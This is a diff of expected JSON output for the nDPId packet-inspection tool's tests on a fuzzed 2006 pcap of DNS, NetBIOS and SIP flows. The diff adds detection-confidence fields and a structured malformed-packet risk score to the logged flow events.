-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470141614,"flow_last_seen":1120470144612,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470144612,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470141614,"flow_last_seen":1120470144612,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470144612,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1120469572981,"flow_last_seen":1120470129594,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6089,"flow_avg_l4_payload_len":358,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1120469572981,"flow_last_seen":1120470129594,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6089,"flow_avg_l4_payload_len":358,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1120470158623,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470158623,"pkt":"ADBUADRWAODtAW69CABFAABEaqcAAIARTK7AqAECwKgBAQrFADUAMEUJ3\/AAAAABAAAAAAAAATEBdgEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.v.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.v.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1120470158625,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470158625,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsUARyeF3\/CAAAABAAEAAAAAAXMBMAElcwAyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470158625,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470158625,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469985981,"flow_last_seen":1120469994988,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1120470170646,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470170646,"pkt":"ADBUADRWAODtAW69CABFAABIaqwAAIARTKXAqAECwKgBAQpQADUANOIMR\/IBAAABAAAAAAAABKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1120470171641,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470171641,"pkt":"ADBUADRWAODtAW69CABFAABIaq0AAIARTKTAqAECwKgBAQrhADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3RkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._tdp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._tdp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470173644,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1120470173644,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470173644,"pkt":"ADBUADRWAODtAW69CABFAABIaq4AAIARTKPAqCVzgKgBAQrGADUANOIMR\/IBABwBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1120470175647,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470175647,"pkt":"ADBUADRWAODtAW69CABFAABIaq8AAIARTKLAqAECwKgBAQrGADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAIhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":545,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":545,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1120470179653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470179653,"pkt":"ADBUADRWAODtAW69CABFAABIarAAAIARTKHAqAECwKgBAQrGADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJZ3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.gybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
